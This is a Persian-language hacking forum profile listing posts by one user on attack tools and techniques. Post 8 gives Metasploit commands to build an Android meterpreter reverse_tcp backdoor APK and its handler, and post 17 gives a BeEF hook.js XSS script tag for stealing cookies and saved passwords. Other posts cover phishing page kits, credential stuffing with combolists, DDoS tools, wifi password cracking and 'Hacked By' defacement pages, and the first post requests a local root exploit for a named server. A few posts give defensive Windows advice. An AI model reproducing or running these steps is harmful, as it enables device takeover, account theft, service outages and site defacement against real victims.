رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

6pish

کاربر رسمی
  • ارسال ها

    64
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    15

تمامی موارد ارسال شده توسط 6pish

  1. با عرض سلام خدمت عزیزان دوستان یه لوکال روت لازم داشتم از این کرنل: Linux server1.myadeska.de 3.10.0-514.10.2.el7.x86_64 #1 SMP Fri Mar 3 00:04:05 UTC 2017 x86_64 فوری:)
  2. معرفی ابزار تحت وب Recon-ng recon-ng: ابزاری کاربردی جهت جمع آوری اطلاعات از دامین و سایر دامین های متصل به هم که از تکنیک های اولیه برای نفوذ به یک وبسایت یا سرور میباشد این ابزار با داشتن ماژول زیادی جهت جمع آوری اطلاعات از تارگیت مورد نظر در اختیار شما قرار میدهد. 1- تایپ عبارت recon-ng در ترمینال ابزار در محیط کامندی برای شما به نمایش در خواهد امد. 2- با دستور show modules کلیه ماژول ها برای شما لیست خواهد شد. 3- با انتخاب ماژول مورد نظر از دستور use استفاده کنید.مثال:(use recon/hosts-hosts/resolve) 4- ست کردن تارگیت مورد نظر با دستور set . مثال:( set google.com) 5- با دستور run اقدام به اغاز حمله خود کنید. *** بعد از انجام مراحل بالا نتیجه کار برای شما نشان داده خواهد شد. ==> موفق باشید.
  3. با سلام بعضی از دوستان هستند که مخازن کالی رو اپدیت نکردن، که بدون اپدیت مخازن امکان نصب پکیج ها با دستورات apt-get میسر نیست به همین خاطر این توضیحات را ارائه کردم. موفق باشید.
  4. 6pish

    کمک...

    با سلام خدمت عزیزان مشکل شما نداشتن مخازن کالی هست ابتدا به مسیر زیر برید و فایل sources.list رو باز کنید و کد های زیر رو درون فایل کپی و ذخیره کنید اوکی میشه. deb [Hidden Content] /wheezy main contrib non-free deb [Hidden Content]kali kali-dev main contrib non-free deb [Hidden Content]kali kali-dev main/debian-installer deb-src [Hidden Content]kali kali-dev main contrib non-free deb [Hidden Content]kali kali main contrib non-free deb [Hidden Content]kali kali main/debian-installer deb-src [Hidden Content]kali kali main contrib non-free deb [Hidden Content]kali-security kali/updates main contrib non-free deb-src [Hidden Content]kali-security kali/updates main contrib non-free deb [Hidden Content]kali kali-bleeding-edge main
  5. 6pish

    Kali linux 1.1.0

    با عرض سلام دلیل به وجود اومدن این مشکل هنگام نصب کالی بوده باید از اول مراحل نصب را پیش برین تا برسین به قسمت install the system بعد از نصب باید در قسمت boot maneger پاسخ منفی بدین و پارتیشنی که از قبل کالی برای شما ایجاد کرده به نام boot با دستور زیر در قسمت boot maneger وارد کنید /dev/sda بعد عددجلوی مربع میتونه 6 باشه یا 8 مشکل تون حل میشه موفق باشید
  6. با سلام دلیل کار نکردن پیلود شما در بیرون از شبکه داخلی تون به خاطر نداشتن یک ip ثابت یا همون استاتیک هست ... برای رفع این مشکل شما میتونین از سرور مجازی تهیه کنید و از سرور اقدام به تست نفوذ کنید. بعدام پیلود متاسپلویت روی بعضی از گوشی ها جوابگو نیست مخصوصا مدل های sony که به محض دسترسی به گوشی ابزارهای منیتی گوشی دسترسی شما را قط خواهد کرد. آموزش تصویری را میتونید از لینک تاپیک زیر دریافت کنید... [Hidden Content] موفق باشد.
  7. معرفی ابزار امنیتی Metasploit متاسپلویت ابزاری کاملا متن باز برای متخصصین امنیت شبکه میباشد که با استفاده از متاسپلویت میتوان از آسیب پذیری های سیستم ها را مورد تست نفوذ قرار داد. و این ابزار به صورت دیفالت از اکسپلویت های مختلفی بهره میگیرد ولی شما هم میتوانید اکسپلویت های شخصی خود را در محیط متاسپلویت اظافه کنید. --> با استفاده از متاسپلویت شما قادر خواهید بود ب ساخت backdoor اقدام به پیاده سازی حملات از جمله به گوشی های هوشمند اندروید، ویندوز و دیگر نرم افزار های کاربردی کنید. ==> با دستور زیر اقدام به بالا آوردن محیط کنسولی متاسپلویت کنید: msfconsole هنگامی که نیاز به ماژول خاصی مثل pdf داشتید با دستور زیر اقدام به جستجوی ماژول های لازم کنید: show pdf با ست کردن هر ماژول با هر مرحله آپشن های لازم را با دستور زیر برای شما نمایش داده خواهد شد: show options ---> و در ادامه با ست کردن پیلود گوش دهنده meterpreter اقدام به شنود شبکه، دسترسی به webcam، shell و ... کنید. **** آموزش تصویری حمله به گوشی های هوشمند اندروید + رهگیری نفوذگر پیوست شد. Android-Hacking.part1.rar Android-Hacking.part2.rar
  8. 6pish

    پرسش

    با سلام از این دستورات اقدام به ساخت فایل بک دور کنید: ... تذکر: از این کامندی که شما اسکرین گرفتین ابتدا باید ip اصلی را وارد کنید و در مرحله دوم local ip را وارد کنید. msfconsole use android/meterpreter/reverse_tcp *set LHOST *your ip address set LPORT 4444 generate -t raw -f 6pish.apk (تا این مرحله فایل بک دور به اسم 6pish.apk در مسیر root ساخته شد) ------------------------------------ use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp *set LHSOT *local ip address set LPORT 4444 show options exploit (حالا فایل در پشتی آماده نصب در گوشی هوشمند تارگت هست تا شما بتونید به کلیه گوشی دسترسی بگیرید) موفق باشید...
  9. معرفی ابزار xerosploit ابزاری فوق العاده کاربردی برای کسانی که علاقه مند به حملات MITM هستند که این ابزار امکاناتی نظیر شنود پکت های درون شبکه , ربودن پسورد های درون شبکه و کلی امکانات دیگه. این ابزار به صورت دیفالت روی کالی نصب نیست و شما با دستورات زیر میتونید اقدام به نصب ابزار در محیط ترمینال کنید: apt-get update apt-get upgrade git clone [Hidden Content] cd xerosploit && sudo python install.py sudo xerosploit با دستورات بالا ابزار برای شما نصب و در محیط کامندی اجرا خواهد شد. موفق باشید
  10. معرفی ابزار Text Finde فیشینگ از جمله حملاتی است که سعی در بدست اوردن اطلاعات شخصی شما در فضای اینترنت می باشد و شما به بهره گیری از این ابزار اقدام در خواندن اطلاعات صفحات جعلی کنید. سوال: کار این ابزار چیه؟ حالا شاید برای شما سوال باشه که این ابزار چیکار میتونه بکنه , این ابزار به زبان پایتون نوشته شده است و شما بعد از پیدا کردن صفحات جعلی اینترنتی اقدام به استخراج اطلاعات ذخیره شده با پسوند txt در وبسایت کنید و طلاعات ذخیره شده در صفحات جعلی را دانلود کنید. موفق باشید. **** فایل پیوست شد پسورد فایل guardiran.org Text Finde.rar
  11. 6pish

    لاگین کردن به سایت

    با سلام شما میتونید با ابزار sentry mba اقدام به تست پسورد روی هر پیج لاگین چه سایت باشه چه اینستا و... 1. ابتدا باید کانفیگ اون سایت رو بدست بیارید 2. یه لیست پروکسی به نرم افزار بدید تا با هر بار تست پسورد از پروکسی استفاده کنه و ip شما را بلاک نکنه 3. میتونید از کمبولیست اقدام به تست کنید. موفق باشید...
  12. معرفی اکسپلویت DDOS Attack این ابزار به زبان پایتون نوشته شده است که با این ابزار قدرتمند شما قادر خواهید بود حملات dos , ddos سنگین را علیه تارگیت خودتون انجام دهید نکته: چنان چه این ابزار را در سرور های زامبی خود اجرا کنید و به یه تارگیت حمله کنید قادر هست سایت ها و سرور های بزرگ رو down کنه. پسورد فایل: guardiran.org DDOS Attack.rar
  13. 6pish

    امنیت در ویندوز

    بالا بردن امنیت در شبکه های کامپیوتری امروزه خیلی از ماها از کامپیوتر های در یک رنج ip یا همون شبکه سروکار داریم چه در اداره جات چه در مدارس و دانشگاه ها و... حالا امنیت 100 درصد نیست ولی باید امنیت را در حد قابل قبولی افزایش داد که در چند مورد خلاصه میکنم... 1. استفاده از سویچ در کنار روتر در شبکه که امنیت در مقابل شنود بسته های شبکه را چند درصدی افزایش میدهد. 2. پرهیز از استفاد کردن روتر های TPLINK و DLINK ترجیحا از روترهای سیسکو و میکروتیک استفاده شود، زیرا اکسپلویت های زیادی برای دور زدن پسورد این نوع روتر ها وجود داره که با بدست آوردن این پسورد هکر قادر خواهد بود تا به اطلاعات مهم شما دست پیدا کند و حملاتی از جمله مهندسی اجتماعی روی شبکه شما انجام دهد. 3. شاید شما از جمله افرادی باشید که از تلفن ، فکس ، دوربین مداربسته و پرینتر در یک شبکه استفاده میکنید که بنده توصیه نمی کنم زیرا هکر بعد از نفوذ به شبکه داخلی قادر خواهد بود تا تماسها ،فکس ها و اطلاعات پرنت شده و دوربین های مداربسته شما دست پیدا کند. نکته امنیتی: 1. به صورت جداگانه در شبکه قرار بگیرند 2. قرار دادن این چهار دستگاه به پشت proxy 4. اجرا نکردن فایل های مشکوک که از منابع نامعلوم ارسال می شوند چه ابزار باشد چه یک فایل pdf حاوی اطلاعات شرکت یا ... ؛ هکر ها از این قبیل روش ها حملاتی از جمله مهندسی اجتماعی که قبلا از شبکه بدست آورده اند با این گونه فایل ها اقدام به گرفتن دسترسی به شبکه داخلی شما را دارند. موفق و سربلند باشید.
  14. معرفی ابزار scapy ابزاری قدرتمند در زمینه تولید بسته ، اسکن شبکه و شنود بسته ها می باشد با این ابزار شما میتونید در شبکه بسته تولید کنید و پاسخ بسته را دریافت کنید. با این دستور بزار برای شما به نمایش در میاد.. scapy موفق باشید...
  15. 6pish

    امنیت در ویندوز

    با سلامی دوباره خدمت دوستان امروز میخوام برای پیشگیری از قوع حمله هکری علیه ویندوز یکم توضیح بدم امیدوارم مطالب بنده حداقل بتونه چند درصدی علم شما را بالا ببره. ما علاوه بر چک کردن پورت های باز و پروسس های فعال ابتدا برای پیشگیری باید به چند نکته توجه کنیم ... 1. خودداری از کلیک بر روی لینک های مشکوک بخصوص لینک هایی که به هر شکل مهندسی اجتماعی برای شما ارسال میشوند و مخصوصا لینک هایی که دارای ip هستند به شدت خودداری کنید 2.خودداری از نصب نرم افزار مشکوک و کم حجم که هکر ها با این ابزار ها قادر هستند داده های شما را مستقیم روی سرور هکر آپلود کنه که انتی ویروس ها قادر به شناسایی آن نیستند( هنگامی که ابزار مخربی را بعد از نصب متوجه شدین با خواندن سورس کد ابزار ip یا دیگر آدرس هکر با بیرون بکشید) 3. به هیچ عنوان ip ولید خود را در اختیار کسی قرار ندهید (هکر ها در کمین هستند)
  16. اموزش قرار دادن تصویر در صفحه دیفیس در اینجا شما با اظافه کردن تصویر در صفحات دیفیس اشنا خواهید شد. <html> <title>.:: HACKED ::.</title> <br> <body bgcolor = black> <center> <h1> <font color= red>HA CK ED BY 6P I SH</font> </h1> </center> <hr > <center><img src =[Hidden Content]; </body> </html> بقیه کد ها رو در بالا توضیح دادم میمونه کد پایین: <hr> با این دستور گفتم یک خط مستقیم بزار <center><img src =[Hidden Content]; با دستور center گفتم چیزی که میخوای بزاری در وسط باشه با دستور <img src =[Hidden Content]; گفتم یه فایل تصویری از مسیر روبرویی که گذاشتم دانلود کن و در وسط صفحه به نمایش در بیار. موفق باشید
  17. معرفی ابزار BeEF برای پیاده سازی حملات تحت وب BeEF در دسته ابزار هایی قرار دارد که در تست نفوذ استفاده می شود و برای اجرای حملات کلاینت در مقابل مرورگر های پر کاربرد که قابل مدیریت کلاینت های متصل به هم باشند با استفاده از اسیب پذیری xss است که از لینک ساخته شده توسط ابزار که از زبان جاوا اسکریپت نوشته شده به محض کلیک هدف به این لینک قربانی برای شما در ابزار به نمایش در میاد که شما میتوانید به عنوان زامبی ازش استفاده کنید نمونه لینک: <script type=text/javascript src=http:// your - ip>:3000/hook.js></script> *** با کلیک کردن قربانی به این لینک شما میتونید تمامی پسورد های ذخیره شده ای مرورگر قربانی و... رو از طریق کوکی های مرورگر هدف که توسط ابزار به شما ارسال شده است بدست بیارید. نکته: ابزار کاملا با صفحه ای گرافیکی و زیباست که با اجرای این ابزار ابتدا از شما یوزرنیم و پسورد میخواد که هر دو beef می باشد. موفق باشید
  18. معرفی ابزار setoolkit برای ساخت صفحات تقلبی setoolkit : ابزاری قدرتمند در زمینه ساخت صفحات جعلی و حملات روی ماشین ها و ایجاد دسترسی می باشد که در محیط کامندی ترمینال با وارد کردن اسم ابزار ،ابزار برای شما اجرا و اپشن های مربوطه برای استفاده ای شما نمایان خواهد شد و شما با انتخاب عددی اپشن مورد نظر عملیات خورد را آغاز کرده و بعد از وارد کردن ادرس سایت فایل index به همراه فایل txt که برای ذخیره اطلاعات وارد کرده قربانی میباشد در مسیر زیر برای شما ساخته خواهد شد. var/www/html نکته: چنان چه میخواهید فایل که سایت مورد نظر که فیک می باشد که خودتون ساختین با ست کردن ip لوکال خود درون ابزار و وارد کردن ip لوکال خودتون درون مرورگر سایت هدف برای شما باز خواهد شد . نکته: چنان چه سایت مورد نظر در مرورگر بالا نیومد با دستو ر زیر آپاچی خود رو فعال کنید: service apache2 start و از دیگر امکانات جذابی که این ابزار داره میتونید با ست کردن روی متاسپلویت میتونید حملاتی نظیر ایجاد backdor روی سیستم عامل ها استفاده کنید و کلیه دسترسی ماشین قربانی را بدست بگیرید از جمله shell ، webcam و... موفق باشید. *** اموزش تصویری پیوست شد *** پسورد فایل: guardiran.org stoolkit_ kali linux.rar
  19. معرفی ابزار مهم و کاربردی websploit websploit ابزاری قدرتمند در زمینه حملات تحت وب از جمله این عملیات ها عبارتند از حملات تکذیب سرویس دهی (dos) ، پیداکردن صفحات لاگین ادمین، حملات علیه سرویس دهنده های وایرلس و بلوتوث و بسیاری از امکانات دیگر. با دستور زیر اقدام به اجرای این ابزار مهم کنید: websploit با دستور زیر اقدام نمایش اپشن ها و ابزار های مود استفاده برای ایجاد حمله خود استفاده کنید: show modules با دستور زیر قدام به حمله کنید :(مثلاحملات dos) use network/web killer set TARGET site.com run نکته: به جای site.com تارگیت مورد نظر را وارد کنید. موفق باشید. *** فایل اموزش تصویری پیوست شد *** پسورد فایل: guardiran.org how websploit in kali linux.rar
  20. معرف ابزار crunch crunch یک ابزار قدرتمند در زمینه ساخت پسورد لیست میباشد که در محیط کامندی قابل اجرا می باشد و شما با این ابزار میتونید هم به صورت فایل ذخیره کنید و هم میتونید مستقیم با دستورات زیر اقدام به ساخت پسورد لیست و تست پسورد هم زمان به تارگیت خود کنید. دستور ساخت فایل پسورد لیست در محیط کامندی ترمینال: crunch 4 6 0123456789 -o /root/Desktop/guardiran.txt شما با این دستور میتونید یه پسورد لیست کامل از اعداد داشته باشید که در دسکتاپ شما به صورت فایل txt به نام گارد ایران ذخیره خواهد شد. دستور کرک فایل با crunch که نیاز به ساخت پسورد لیست نباشه و دیگه لازم نباشه شما پسورد لیست بسازین و مستقیم با این دستور عملیات کرک رو انجام بدین: نکته : در دستور زیر airecrack رو مثال میزنم که برای کرک پسورد wifi دیگه لازم نباشه پسورد لیست بدین )crunch 8 11 0123456789 | airecrack-ng /root/(file-name)01.cap -w - -e (wifi-name موفق باشید
  21. اینجا میخواهیم یه صفحه ساده html دیفیس درست کنیم که فقط روی صفحه متن باشه اول کد ها رو ذکر می کنم و در پایین توضیحات کامل کد ها رو براتون میگم ... <html> <title>.:: HACKED ::.</title> <br = 1> <br = 2> <br = 3> <br = 4> <br = 5> <br = 6> <br = 7> <br = 8> <body bgcolor = black> <center> <h1> <font color= gren>Hacked By </font> </h1> </center> <center> <h1> <font color= #ffffff>Guardiran Security Team</font> </h1> </center> <center> <h1> <font color= red>Telegram.me/guardiran_org</font> </h1> </center> </body> </html> حالا توضیحات خط به خط کد ها: نکته : اسلش(/) در اینجا برعکس خورده ولی از اینجا کد ها رو در فایل txt کپی پیست کنید اونجا بهتر نشون میده و برای اجرا پسوند فایل رو به html تغییر دهید. <html> : در زبان برنامه نویسی تقریبا 90 درصد دستوراتی رو که باز میکنیم باید در پایان دستور ببندیم حالا من در ابتدا یه <html> رو با دو تا تگ بزرگ و کوچیک باز کردم و در اخر با اسلش(/) بستم به این شکل(</html> <title>.:: HACKED ::.</title> : با دستور title میگم تایتل سایت یا همون متنی که بالای تب مرورگر باز میشه این متن باشه .::HACKED::. و در اخر هم دستور رو بستم. <br = 1> <br = 2> <br = 3> <br = 4> <br = 5> <br = 6> <br = 7> <br = 8> : با این دستور گفتم 8 خط بیا پایین تر از صفحه تا من تغییرات لازم رو اعمال کنم. <body bgcolor = black> : با دستور body گفتم میخوام از اینجا شروع کنم به اعمال تغغرات گرافیکی صفحه و با دستور bgcolor = black گفتم رنک زمینه رو سیاه کن. <center> با این دستور گفتم هر چی که تایپ میکنم رو در وسط صفحه قرار بده و با دستور <h1> گفتم سایز متن هامو بزرگ کن شما با تغییر عدد 1 میتونین سایز متن رو بزرگ و کوچیکتر کنین. <font color= gren> : با این دستور گفتم رنگ این متن رو Hacked By سبز کن. </font> </h1> </center> : و در اخر هر چی رو که باز کردم دوباره بستم. <font color= #ffffff> : اینم یه دستور تغییر رنگ های مخصوص برنامه نویسی این رنگ سفید هست. بقیه رو هم به همین صورت باز کردم و بستم و در اخر bodyو بعدش html رو بستم امیدوارم مورد پسند شما واقعه شده باشه موفق باشین
  22. با عرض سلام خدمت اعضای محترم انجمن گارد ایران بنده در این تاپیک قصد دارم تا شما رو با طراحی یک صفحه دیفیس با زبان html اشنا کنم و از عزیزانی که قصد اموزش ساخت دیفیس دارند میتونند در همین تاپیک اقدام به اموزش کنند با تشکر
  23. 6pish

    امنیت در ویندوز

    شناسایی در پشتی یا (backdoor ) یا ویروس جاسوسی از طریق پورت باز شده مشکوک در ویندوز در پشتی یا (backdoor ) چیست؟ به فرض مثال یه هکر با استفاده از یه ضعف در سیستم شما وارد سیستم شما شده و برای اینکه دیگه دردسر نفوذ دوباره به سیستم شما را نکشه و یا این که شما این ضعف رو رفع کردین هکر میاد بعد از نفوذش یه پورت روی سیستم شما باز میکنه و یه ابزار مخرب روی سیستم شما باز میکنه و اون ابزار رو با پورتی که باز کرده مچ میکنه هر وقت دلش خواست میتونه به سیستم شما لاگین کنه به این روش میگن درپشتی یا backdoor . ****در اینجا یاد میگیرید چجوری پورت های باز رو شناسایی و مانیتورینگ کنید تا پورتهایی که اخیرا باز شده اند رو شناسایی کنید. برای مشاهده پورت های باز در محیط کامندی ویندوز(cmd) دستور زیر رو تایپ کنید: netstat -ano برای مانیتورینگ کردن پورت های باز دستور زیر رو تایپ کنید:(مانیتورینگ یعنی پورت های باز رو برای شما ذخیره میکنه) netstat -ano 60 >d:/guardiran.txt با زدن این دستور یه فایل txt به نام guardiran در درایو d شما ساخته میشه و هر 1 دقیقه پورت های باز شما رو در این فایل ذخیره میکنه نکته: بستگی به خودتون داره میتونین زمان ذخیره پورت رو کم یا زیاد کنین فقط اینجا باید به ثانیه وارد کنید موفق باشد.
  24. 6pish

    امنیت در ویندوز

    شناسایی پروسس های فعال مخرب در این جلسه ما روش شناسایی از طریق پروسس (Process ) های فعال آشنا میشیم پروسس (System Process ) چیست؟ شامل یک سری برنامه هایی به صورت آشکار و پنهان می باشند که به دور از چشم کاربر در پس زمینه اجرا می شوند. هر بار که کامپیوتر روشن می گردد، با کلید های ترکیبی ctrol+shifi+esc در ویندوز یک پنجره برای شما باز میشه و با رفتن به تب دوم یعنی Processes میتونید پروسس های فعال را اونجا مشاهده کنید. ** پرسش: شاید این سوال برای شما پیش بیاد که چجوری بفهمیم کدوم فایل سیستمی هست و کدوم یکی مخرب؟؟ جواب : روش اول: شما میتونین از جستجوی وب برای سناسایی فایل های مخرب و سیستمی استفاده کنید یعنی اسم پروسس را در گوگل سرچ کنید که فایل مخرب هست یا سیستمی. روش دوم: برای همین منظور من یک ابزار در زمینه شناسایی پروسس فعال پیوست میکنم که با نصب این نرم افزار و اجرای کاملا گرافیکی پروسس های مشکوک را به رنگ قرمز در میاره و راحت شناسایی میشن. نحوه از کار انداختن پروسس های فعال: ابتدا باید با کلید های کنترلی که بالا گفتم روی پروسس مربوطه کلیک کنید و با زدن گزینه End Process پروسس موقتا برای شما غیر فعال میشه و اگه در درایو c فایل اصلی این پروسس را پاک نکنید بعد از ریستارت کامپیوتر شما باز شروع به کار خواهد کرد. مسیر هایی که پروسس های مخفی : ابتدا فایل های خود را از حالت مخفی یا همون hidden files در بیارید تا همه ای فایل های مخفی برای شما نمایان شود و بعد با رفتن در مسیر های زیر اقدام به پیدا کردن فایل مخرب کنید C:\Users\Default\AppData\Local C:\ProgramData این 2 مسیر هایی هستند که بیشتر فایل های مخرب اینجا خودشونو مخفی میکنند. pass files: guardiran.org processhacker-2.36-setup.rar
  25. 6pish

    امنیت در ویندوز

    با عرض سلام به همه ای اعضای محترم گارد ایران دلیل این که این تاپیک رو شروع کردم اینه که متاسفانه ویروس های جاسوسی های زیادی هستند که انتی ویروس قادر به شناسایی شان نیست اسیب های جبران ناپذیری از جمله سرقت اطلاعات شخصی افرادی که از سیستم عامل ویندوز استفاده میکنند قادر به شناسایی این چنین ویروس هایی نیستند و خیلی از عزیزانی که در زمینه هکینگ فعالیت میکنند به خاطر استفاده از ابزار هایی که سورس های مخربی دارند نمیتونند از انتی ویروس استفاده کنند در این تاپیک نیز به امنیت اطلاعات این عزیزان افزوده خواهد شد امیدوارم از مطابی که گذاشته خواهد شد استقبال شود...
×
×
  • ایجاد مورد جدید...